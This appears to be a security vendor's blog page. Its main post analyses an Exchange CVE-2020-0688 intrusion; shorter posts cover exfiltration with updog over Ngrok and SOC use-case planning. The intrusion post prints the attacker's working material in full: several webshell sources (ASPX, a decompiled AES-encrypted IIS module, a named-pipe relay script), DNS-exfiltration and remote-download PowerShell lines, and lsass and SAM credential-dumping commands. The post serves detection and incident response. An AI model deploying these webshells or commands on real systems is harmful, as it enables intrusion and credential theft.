


In this blog I describe a recent intrusion that started with the exploitation of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. For the exploit to work, the attacker needs an authenticated account that can make requests against the Exchange Control Panel (ECP). Some organizations may still not have patched this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" in delaying this patch could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email or via a simple dictionary attack against the Exchange server. The technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes named pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms native to the NetWitness Platform that will alert your organization to such activity.


Exchange Exploit - CVE-2020-0688


The first sign of the exploit appeared on 26 February 2020. The attacker leveraged the credentials of an account they had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to a poor password policy, or by preceding the exploit with a credential harvesting attack. Once at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.
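The two-step decode is easy to script outside of CyberChef as well. Here is a minimal Python sketch; the payload used below is an illustrative stand-in, not the actual exploit string:

```python
import base64
import urllib.parse

def decode_exploit_parameter(raw: str) -> str:
    """URL-decode, then Base64-decode, an ECP exploit parameter from the IIS logs."""
    url_decoded = urllib.parse.unquote(raw)
    return base64.b64decode(url_decoded).decode("utf-8")

# Hypothetical payload: 'cmd /c echo flogon' Base64- and then URL-encoded.
encoded = urllib.parse.quote(base64.b64encode(b"cmd /c echo flogon").decode())
print(decode_exploit_parameter(encoded))  # -> cmd /c echo flogon
```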


IIS log entry of exploit code


The following CyberChef recipe (URL Decode followed by From Base64) helps us decode the highlighted exploit code:


The highlighted encoded data above decodes to the following where we see the attacker attempt to echo the string 'flogon' into a file named flogon2.js in one of the public facing Exchange folders:


Decoded exploit command


The attacker performed two more exploit-success checks by launching an ftp command to anonymously log in to an IP address, followed by a ping request to a Burp Collaborator domain:


Exploit-success checks


The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to an IP address to ensure that the server was still exploitable. These were followed by commands to write simple strings into files in the Exchange directories, as shown below:


Exploit success checks


The attacker also attempted to create a local user account named "public" with password "Asp-=14789" via the exploit, and attempted to add this account to the local administrators group. Both actions failed.


Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add


The attacker issued several ping requests to subdomains under, which is a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what enables the sending of data to the attacker. Again, the attacker appears to have been trying to see if the exploit commands were successful, and these DNS requests would have confirmed the success of the exploit commands.


Here is what the attacker would have seen if the requests were successful:


DNSBin RSA test


Here are some of the generic ping commands the attacker tried:
ping -n 1
ping -n 1
ping -n 1


After confirming that the DNS requests were being made, the attacker started concatenating the output of PowerShell commands to these DNS requests in order to see the results of the commands. It is worth mentioning that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker had no way to see their results. Hence, the attacker initially wrote some output to files as shown above (such as flogon2.txt), or, as in this case, sent the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:


Concatenating Powershell command results to DNS queries


powershell Resolve-DnsName((test-netconnection -port 443 -informationlevel quiet).toString()+'')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'')


These types of requests would have confirmed that the server was allowed to connect outbound to the Internet, tested the existence of the specified path, and sent the hostname to the attacker.
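The exfiltration pattern itself is trivial: the command output simply becomes the left-most DNS label of a domain the attacker controls. A hedged Python sketch (the domain below is a placeholder, not the actual service the attacker used):

```python
def exfil_hostname(value: str, domain: str) -> str:
    """Prepend command output as a DNS label, mirroring the attacker's
    Resolve-DnsName((<command>).toString() + '<attacker domain>') pattern."""
    # DNS labels cannot contain spaces; the attacker relied on simple
    # True/False/hostname strings, so a naive substitution suffices here.
    label = value.replace(" ", "-")
    return f"{label}.{domain}"

# 'example-collab.net' stands in for the attacker's DNS-logging domain.
print(exfil_hostname("True", "example-collab.net"))  # -> True.example-collab.net
```

Any recursive DNS resolution of that name reaches the attacker's authoritative server, so the lookup itself delivers the data, even with no direct connection between victim and attacker.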


Exploit command output exfiled via DNS




Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted at pastebin into this directory under a file named OutlookDN.aspx (I am redacting the full pastebin link to prevent the hijacking of such webshells on other potential victims by other actors, since the webshell is password protected):


Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')


The webshell code downloaded from pastebin is shown below:


Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
    Process p = new Process();
    p.StartInfo.FileName = "cmd";
    p.StartInfo.Arguments = "/c " + cmd.Text;
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.Start();
    Response.Write("<pre>\r\n" + p.StandardOutput.ReadToEnd() + "\r\n</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
    if (Request.Params["pw"] != "*******REDACTED********") Response.End();
}
</script>


At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:


Webshell 2
powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is:


<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>
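The decode is easy to verify against the Base64 blob from the upload command with a couple of lines of Python:

```python
import base64

# The Base64 payload from the attacker's WriteAllText command.
blob = ("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5"
        "dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5D"
        "b29raWVzWyJjIl0uVmFsdWUpKTslPgo=")
decoded = base64.b64decode(blob).decode("utf-8")
print(decoded)
```

The one-liner webshell takes a destination path in the `p` parameter and file content in a Base64-encoded cookie named `c`, giving the attacker an arbitrary file-write primitive.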


At this point the attacker performed some of the most common early-stage activities: credential harvesting, user and group lookups, pings, and directory traversal.


The credential harvesting consisted of several common techniques:


Credential harvesting related activity

Used Sysinternals' ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes.

These files were then placed in public-facing Exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"
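The first step of the comsvcs.dll technique, recovering the lsass.exe PID from tasklist output, can be mirrored in a few lines. The sample line below is a mock-up of `tasklist | findstr lsass.exe` output, reusing PID 944 from the attacker's MiniDump command:

```python
def lsass_pid(tasklist_output: str) -> int:
    """Extract the lsass.exe PID from `tasklist | findstr lsass.exe` output."""
    for line in tasklist_output.splitlines():
        parts = line.split()
        if parts and parts[0].lower() == "lsass.exe":
            return int(parts[1])  # the second tasklist column is the PID
    raise ValueError("lsass.exe not found in tasklist output")

# Hypothetical findstr output resembling the attacker's first step.
sample = "lsass.exe                      944 Services                   0     48,288 K"
print(lsass_pid(sample))  # -> 944
```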


In addition to the traditional ASPX-type webshells, the attacker introduced another type of webshell into the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to set up this new backdoor:




The file System.Web.TransportClient.dll is the webshell, whereas tmp.ps1 is a script that registers this DLL with IIS. The contents of this script are shown below:


[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"


The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):


using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;

namespace System.Web.TransportClient
{
  public class TransportHandlerModule : IHttpModule
  {
    public void Init(HttpApplication application)
    {
      application.BeginRequest += new EventHandler(this.Application_EndRequest);
    }

    private void Application_EndRequest(object source, EventArgs e)
    {
      HttpContext context = ((HttpApplication) source).Context;
      HttpRequest request = context.Request;
      HttpResponse response = context.Response;
      string keyString = "kByTsFZq********nTzuZDVs********";
      string cipherData1 = request.Params[keyString.Substring(0, 8)];
      string cipherData2 = request.Params[keyString.Substring(16, 8)];
      if (cipherData1 != null)
      {
        response.ContentType = "text/plain";
        string plain;
        try
        {
          string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
          plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) : TransportHandlerModule.run(command);
        }
        catch (Exception ex)
        {
          plain = "error:" + ex.Message + " " + ex.StackTrace;
        }
        response.Write(TransportHandlerModule.Encrypt(plain, keyString));
      }
    }

    private static string Encrypt(string plain, string keyString)
    {
      byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
      byte[] salt = new byte[10] { 1, 2, 23, 234, 37, 48, 134, 63, 248, 4 };
      byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
      RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
      rijndaelManaged1.Key = bytes1;
      rijndaelManaged1.IV = bytes2;
      rijndaelManaged1.Mode = CipherMode.CBC;
      using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
      using (MemoryStream memoryStream = new MemoryStream())
      using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
      {
        byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
        memoryStream.Write(bytes2, 0, bytes2.Length);
        cryptoStream.Write(bytes3, 0, bytes3.Length);
        return Convert.ToBase64String(memoryStream.ToArray());
      }
    }

    private static string Decrypt(string cipherData, string keyString)
    {
      byte[] bytes = Encoding.UTF8.GetBytes(keyString);
      byte[] buffer = Convert.FromBase64String(cipherData);
      byte[] rgbIV = new byte[16];
      Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
      RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
      rijndaelManaged1.Key = bytes;
      rijndaelManaged1.IV = rgbIV;
      rijndaelManaged1.Mode = CipherMode.CBC;
      using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
      using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
      using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
      {
        return new StreamReader((Stream) cryptoStream).ReadToEnd();
      }
    }

    private static string run(string command)
    {
      string str = "/c " + command;
      Process process = new Process();
      process.StartInfo.FileName = "cmd.exe";
      process.StartInfo.Arguments = str;
      process.StartInfo.UseShellExecute = false;
      process.StartInfo.RedirectStandardOutput = true;
      process.Start();
      return process.StandardOutput.ReadToEnd();
    }

    private static string Client(string command, string path)
    {
      string pipeName = "splsvc";
      string serverName = ".";
      Console.WriteLine("sending to : " + serverName + ", path = " + path);
      using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
      {
        StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
        // (the connect and the writes of the path, the command, and the
        // "**end**" terminator are not shown here)
        return new StreamReader((Stream) pipeClientStream).ReadToEnd();
      }
    }

    public void Dispose()
    {
    }
  }
}


The registered DLL shows up in the IIS Modules as TransportModule:


IIS Module Installation


This DLL webshell is capable of executing commands directly via cmd.exe, or of sending the command to a pipe named splsvc. In this setup the DLL acts as the pipe client, i.e. it sends data to the named pipe. To set up the other side of the pipe (the pipe server), the attacker executed this command:


cmd.exe /c WMIC /node:"." process call create "powershell -enc


The encoded data in the PowerShell command decodes to this script, which sets up the pipe server:


$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     }
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                         break
                    }
                    $data += $line + [Environment]::NewLine
               }
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
                    }
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               }
               Write-Host $retval
               # (the write of $retval back to the pipe and the pipe cleanup are not shown here)
          }
     }
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $writer = new-object System.IO.StreamWriter($client)
          $reader = new-object System.IO.StreamReader($client);
          # (the connect and the writes of $path, $data and the '**end**' terminator are not shown here)
          $resp = $reader.ReadToEnd()
          $resp
     }
     $ErrorActionPreference = 'Stop'
     handleCommand
}
Invoke-Command -ScriptBlock $script
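The framing the DLL client and this pipe server agree on is simple: a relay-path line, then payload lines, then a '**end**' terminator. The server-side parsing can be sketched in Python (the message content below is hypothetical, and io.StringIO stands in for the named pipe stream):

```python
import io

TERMINATOR = "**end**"

def read_pipe_message(stream):
    """Parse one client message the way the pipe-server script does:
    the first line is the relay path, and the following lines are the
    command payload, read until the '**end**' terminator."""
    path = stream.readline().rstrip("\n")
    data_lines = []
    while True:
        line = stream.readline().rstrip("\n")
        if line == TERMINATOR:
            break
        data_lines.append(line)
    return path, "\n".join(data_lines)

# A hypothetical message: relay index 0 with next-hop HOST1, then a command.
msg = io.StringIO("0:HOST1\nwhoami\n**end**\n")
print(read_pipe_message(msg))  # -> ('0:HOST1', 'whoami')
```

Note how the leading integer in the path doubles as a hop counter: the server either executes the payload (if it is the last hop) or increments the counter and forwards the message to the next host in the colon-delimited path.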


From an EDR perspective, the interesting aspect of this type of webshell is that, other than the command that sets up the pipe server (executed via the w3wp.exe process), the remaining commands are executed by the PowerShell process hosting the pipe server, even though the commands still arrive through the w3wp.exe process. In fact, once the attacker set up this type of webshell in this intrusion, he/she deleted all of the initial ASPX-based webshells.


Webshell interaction


Although during this incident the pipe webshell was only used on the Exchange server itself, the send function in the pipe-server script shows that commands could also be relayed to named pipes on other internal hosts.


Webshell Data Decryption


In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Let's break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:


POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close


HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******


The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they could be quickly filtered out, especially when we see that the requests to this webshell do not even contain a user agent. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:
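This header-case anomaly is simple to express as a hunting heuristic. A minimal sketch follows; the dictionary-based request representation is an assumption for illustration, not tied to any NetWitness API:

```python
def suspicious_header_case(headers: dict) -> bool:
    """Flag requests that send normally title-cased headers (Host,
    Content-Type, Content-Length) in all-lowercase, as this webshell
    client did."""
    watched = {"host", "content-type", "content-length"}
    return any(name.lower() in watched and name == name.lower()
               for name in headers)

req = {"host": "webmail.example.com",
       "content-type": "application/x-www-form-urlencoded"}
print(suspicious_header_case(req))                              # -> True
print(suspicious_header_case({"Host": "webmail.example.com"}))  # -> False
```

In practice this check would be combined with the other observations (no user agent, lowercase URI) to keep false positives from legitimate clients low.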


The actual command follows the HTTP headers. Let's break down this command:




The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********
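In other words, the request parameter names are themselves slices of the AES key, exactly as the decompiled Substring(0, 8) and Substring(16, 8) calls suggest. In Python slicing terms (redacted key characters shown as asterisks):

```python
# The AES key recovered from the decompiled DLL (partially redacted).
key_string = "kByTsFZq********nTzuZDVs********"

param1 = key_string[0:8]    # name of the first parameter (the command)
param2 = key_string[16:24]  # name of the second parameter (the pipe path)
print(param1, param2)  # -> kByTsFZq nTzuZDVs
```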


The data that follows the first 8 bytes of the key is shown below:




Let's decrypt this data step by step and build a CyberChef recipe to do the job for us:


Steps 1-3: The obfuscated data needs to be URL decoded; however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So we first replace the + with a . (dot), URL decode, and then restore the + characters. The + character will not necessarily be in every chunk of Base64-encoded data, but we need to account for it in order to build an error-free recipe.
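Python's urllib draws the same distinction, which offers an alternative to the replace-dot workaround: `unquote` leaves + alone, while `unquote_plus` (like a naive URL decoder) turns it into a space and corrupts the Base64:

```python
from urllib.parse import unquote, unquote_plus

sample = "abc+def%3D"  # a hypothetical URL-encoded Base64 fragment
print(unquote_plus(sample))  # -> abc def=  ('+' wrongly becomes a space)
print(unquote(sample))       # -> abc+def=  ('+' is preserved)
```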


Decrypting: Step 1-3


Steps 4-5: At this point we can Base64 decode the data. However, the data we get from this step is binary in nature, so we also convert it to ASCII hex, since we need to use part of it for the AES IV.


Decryption: Step 4-5


Steps 6-7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of CyberChef to store these bytes in $R0 and then remove them with the Replace function:
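The same Base64-decode-then-split step can be sketched in Python. The payload here is a hypothetical stand-in built from a known 16-byte IV and a few ciphertext bytes:

```python
import base64

def split_iv_and_ciphertext(b64_payload: str):
    """Base64-decode the payload and split it into the 16-byte AES IV
    that the webshell prepends and the remaining ciphertext."""
    raw = base64.b64decode(b64_payload)
    return raw[:16], raw[16:]

# Hypothetical payload: a known IV followed by some ciphertext bytes.
demo = base64.b64encode(bytes(range(16)) + b"\xde\xad\xbe\xef").decode()
iv, ct = split_iv_and_ciphertext(demo)
print(iv.hex())  # -> 000102030405060708090a0b0c0d0e0f
print(ct.hex())  # -> deadbeef
```

The IV would then feed an AES-CBC decrypt together with the static key recovered from the DLL, mirroring the final CyberChef step.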


Decryption: Step  6-7


Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.


Decryption: Step 8


The actual recipe is shown below:
'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)


We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:


Decryption: Part 2


The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:


Decrypt Response


NetWitness Platform - Detection


The malicious activity in this incident would be detected at multiple stages by NetWitness Endpoint, from the exploit itself to the webshell activity and the subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor web daemon processes (such as w3wp.exe) for uncommon behavior, which primarily falls into three categories:

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).
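As a sketch of the first category, a minimal detection check over endpoint process events might look like the following. The event schema and field names are hypothetical for illustration, not the NetWitness API:

```python
WEB_DAEMONS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def is_webshell_indicator(event: dict) -> bool:
    """Category 1: a web daemon process starting a shell process.
    'parent' and 'child' are assumed field names in a process-start event."""
    return (event.get("parent", "").lower() in WEB_DAEMONS
            and event.get("child", "").lower() in SHELLS)

print(is_webshell_indicator({"parent": "w3wp.exe", "child": "cmd.exe"}))      # -> True
print(is_webshell_indicator({"parent": "explorer.exe", "child": "cmd.exe"}))  # -> False
```

Categories 2 and 3 follow the same pattern, keyed on file-write and child-process events respectively, with an environment-specific allow list.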


NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:


Webshell detection rules


The process tree will also reveal the commands that are executed via the webshell in more detail:


Process flow


Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account


As part of your daily hunting, you should also always look at any Fileless_Script events, which are common when encoded PowerShell commands are executed:


Fileless_Script events


From the NetWitness packet perspective, such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends deploying such technology in your network to provide visibility into this type of traffic, which makes up a substantial share of the traffic in every network.


Once the traffic is decrypted, several aspects of it fall into typical hunting paths related to the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:


Service Analysis


The webshell commands are found in the Query meta key:


Query meta key


In order to flag the lowercase request to /ews/exchange.asmx, we need to set up a custom configuration using the SEARCH parser, which is disabled by default. We can do the same with the other lowercase headers, which are characteristics of whatever client the attacker is using to interact with this webshell. In the NetWitness Platform we can quickly set this up in the search.ini file of your decoder. Any hits for this string can then be referenced in AppRules using the expression (found = 'Lowercase EWS'), and can be combined with other metadata.


Search.ini config




This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can always lead to early detection and reduced attacker dwell time. The NetWitness Platform will provide your team with the necessary visibility to detect and investigate such breaches.


Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.


What's updog?

Posted by Lee Kirkpatrick, Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and can use HTTP basic auth. It was created by sc0tfree and can be found on his GitHub page. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind by its usage.


The Attack

We start updog with all the default settings on the attacker machine; this means it will expose the directory we are currently running it from over HTTP on port 9090:


In order to quickly make updog publicly accessible over the Internet, we will use a service called Ngrok. This service exposes local servers behind NATs and firewalls to the public Internet over secure tunnels. The free version of Ngrok creates a randomised URL with a lifetime of 8 hours if you have not registered for a free account:


This now means that we can access our updog server over the Internet using the randomly generated Ngrok URL, and upload a file from the victim's machine:


The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok, which are commonly utilised in phishing campaigns because the generated URLs are randomised and short lived. With a recent update to the DynDNS parser from William Motley, many of these services are now tagged in NetWitness under the Service Analysis meta key with the meta value tunnel service:



Pivoting into this meta value, we can see some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious-sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename meta value with a PNG image named updog.png:



Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:



NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:


Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:






Deploy on: Packet Decoder
Description: Detects the usage of Updog
Rule logic: server begins 'werkzeug' && filename = 'updog.png'





As a defender, it is important to monitor traffic to services such as Ngrok, as they can pose a significant security risk to your organisation. There are also multiple alternatives to Ngrok, and traffic to those should be monitored as well. In order for the new meta value tunnel service to start tagging these services, make sure to update your DynDNS Lua parser.


Security Operation Centres (SOCs) come in different forms (e.g. in-house, outsourced, hybrid) and sizes, depending on multiple factors such as the objectives and functions that the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs there will be a SIEM, which acts as the brain of the SOC, picking up anomalies by correlating and making sense of the information coming in from various packet and log sources. More often than not, the efficiency of your SOC in detecting potential breaches in a timely manner depends on the SIEM itself: having the correct sizing and configuration, being integrated with the relevant data sources, and having the right Use Cases deployed, among others. In this post, we will focus on a strategy for planning and developing Use Cases that lead to effective monitoring and detection in your SOC.


Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, many Use Cases may come to mind that cater to different threat scenarios. Most SOCs typically start with the Out-Of-The-Box (OOTB) Use Cases that are available; however, these will not be sufficient in the long run. Hence, there is a need to develop your own Use Cases on top of the OOTB ones. Use Case development is a lengthy and ongoing process, from identifying the problem statement to fine-tuning the Use Cases, and the threat landscape is constantly evolving. Therefore, it is important to prioritise which Use Cases to develop first, and one of the best ways to do so is to come up with a roadmap.


When it comes to road-mapping your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK framework and the VERIS framework, which are useful resources to aid your roadmap planning. However, it is important to note that while such frameworks are good references, they should not be taken wholesale when planning your organisation's Use Case development roadmap: all organisations are unique, and not all areas will be applicable. Prior to planning the roadmap, it is worthwhile to first perform a Priority Analysis, where you identify the priority areas on which the Use Cases should focus, based on factors such as the following:


  •      Existing threat profile including top known threats,


  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)


  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.


With the Priority Analysis being performed, you will then be able to identify which are your “Crown Jewels” and prioritise the protection efforts by developing the relevant Use Cases around them.


The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:


  1.       Define Problem Statement. This highlights the "problem" that you wish to solve (i.e. the threat that you wish to detect) and gives rise to the objective of the Use Case you are planning to develop. It is important to note that when planning which Use Case to develop, the relevance of a Use Case should not be determined solely by the presence of indicators in past logs of the environment: the fact that an incident (e.g. a breach) has not happened before does not mean it will not occur in the future (refer to the Priority Analysis explained in the previous section for a recap on how to identify relevant Use Cases).


  2.       Develop High-Level Logic. Once the objective of the Use Case is clear, the next step is to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters, such as the length of the "view" or "window" and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage, as this may cloud your thinking and increase the chances of introducing errors into your logic design.


